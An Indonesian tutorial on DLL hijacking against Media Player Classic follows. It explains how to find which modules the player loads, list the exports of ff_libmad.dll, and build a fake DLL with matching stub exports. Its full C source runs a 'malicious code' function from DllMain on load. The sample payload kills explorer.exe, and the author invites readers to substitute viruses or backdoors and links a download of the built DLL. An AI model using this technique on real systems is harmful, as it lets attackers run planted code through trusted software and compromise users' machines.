Dll Hijacking

Secara sederhana Dll Hijacking adalah proses pengeksekusian perintah2 jahat ataupun code2 virus yang dilakukan dengan cara memasukkan code tersebut ke dalam file dll yang diload oleh suatu aplikasi / software, dengan kata lain ketika seseorang membuka suatu software yang didalam file librarynya telah di tanam suatu kode jahat, tanpa di sadari seorang tersebut telah ikut mengeksekusi kode jahat yang telah di tanan.
ok karna saya bukan seorang yang paham masalah-masalah teori jadi langsung prakteknya saja ya… hehehe… (maklum lom pernah duduk di bangku kuliahan ^_^)

kali ini kita akan mencoba ngganti dll nya Media Player Clasic ok…

Sofware2 yang harus di siapkan…
                1. Media Player Clasic (yang saya gunakan build number 1.5.0.2827)
                2. Immunity Debugger (pakek oly juga gak papa…!)
                3. C/C++ Compiler (Disini saya pakek wxdefc++) os nya saya pakek Windows 7
                4. Dll Export Viewer http://www.nirsoft.net/utils/dllexp-x64.zip
                 5. Segelas susu hangat… plus camilan biar gak ngantuk….

pertama2 kit harus tau module apa saja yang di load oleh MPC ketika pertama kali di jalankan… dengan cara attach dan run mpc-hc.exe di Immunity Debugger… apabila ada exception tekan Shift+f9 terus sampai program terload secara sempurna… kemudian coba jalankan file video ataupun mp3… setelah itu tekan alt+E untuk melihat module yang terload…

Di atas file ff_libmad.dll terload saat file mp3 di putar… kita bisa menyimpan code jahat kita di file itu ^_^… setelah menentukan module yang akan digunakan kita harus mencari dahulu fungsi2 yang ada dalam modul tersebut agar module yang kita akan buat nanti dapat di tetap di load oleh mpc… untuk mengetahui fungsi apa saja yang ada di dalamnya kita dapat menggunakan tool Dll Export Viewer…

buka Dll Export Vieweràload function from the following DLL Fileàbrowse (C:\Program Files\K-Lite Codec Pack\ffdshow\ff_libmad.dll)àok

kemudian akan muncul nama2 fungsi yang ada di dalamnya…

Ok berdasarkan informasi itu langsung saja kita buat file dll palsu nya ^_^…

buka wxdevc++, kemudian klik file->new->project->dll dan beri nama projectnya “ff_libmad” lalu pilih c project dan tekan ok kemudian otomatis compiler akan mebuat dua file yaitu dllmain.c dan dll.h

ubah dllmain.c menjadi seperti ini…

/////////////////////////////////////////////////////////////////////////////////////////
/* Replace "dll.h" with the name of your header */
#include "dll.h"
#include 
#include 
#include 

void CodeJahat()
{
    char killexplorer[] = "taskkill /im explorer.exe /f";
    WinExec(killexplorer, 0);
}


//Buat Fungsi2 yang sama dengan dll aslinya…
DLLIMPORT void getVersion(){}
DLLIMPORT void mad_frame_decode(){}
DLLIMPORT void mad_frame_finish(){}
DLLIMPORT void mad_frame_init(){}
DLLIMPORT void mad_stream_buffer(){}
DLLIMPORT void mad_stream_finish(){}
DLLIMPORT void mad_stream_init(){}
DLLIMPORT void mad_synth_frame(){}
DLLIMPORT void mad_synth_init(){}


BOOL APIENTRY DllMain (HINSTANCE hInst     /* Library instance handle. */ ,
                       DWORD reason        /* Reason this function is being called. */ ,
                       LPVOID reserved     /* Not used. */ )
{
    switch (reason)
    {
      case DLL_PROCESS_ATTACH:
//CodeJahat Dieksekusi ^_^
            CodeJahat();
        break;
      case DLL_PROCESS_DETACH:
        break;
 case DLL_THREAD_ATTACH:
        break;
      case DLL_THREAD_DETACH:
        break;
    }
    /* Returns TRUE on success, FALSE on failure */
    return TRUE;
}
/////////////////////////////////////////////////////////////////////////////////////////

Fungsi CodeJahat() di atas saya buat untuk mengkill explorer.exe anda bisa ganti CodeJahatnya sesuai keinginan masing-masing ^_^

sekarang proses penentuan apakah berhasil atau tidak… compile ff_libmad kemudian taruh ff_libmad.dll buatan kita di folder C:\Program Files\K-Lite Codec Pack\ffdshow\ sebelumnya anda rename dahulu ff_libmad.dll yang asli jadi ff_libmad(backup).dll buat cadangan yang asli ^_^

setalah itu silahkan coba buka mp3 pakek Media Player Clasic… sebelum itu q saranin mbuka command prompt dulu buat ngembaliin explorer yang di kill paksa… setelah mp3 terbuka walla… explorer pun di tutup paksa… itu tandanya kita berhasil ^_^… Untuk mengembalikan explorer cukup ketik explorer pada command prompt

Bayangkan kalau kode yang kita sisipkan adalah kode virus atau backdoor buat system korban…? Tentunya akan sangat berbahaya bukan…? Anda bisa download file dll beserta source nya yang kita buat tadi di sini http://w1ng13cr3w.webuda.com/download/dll.rar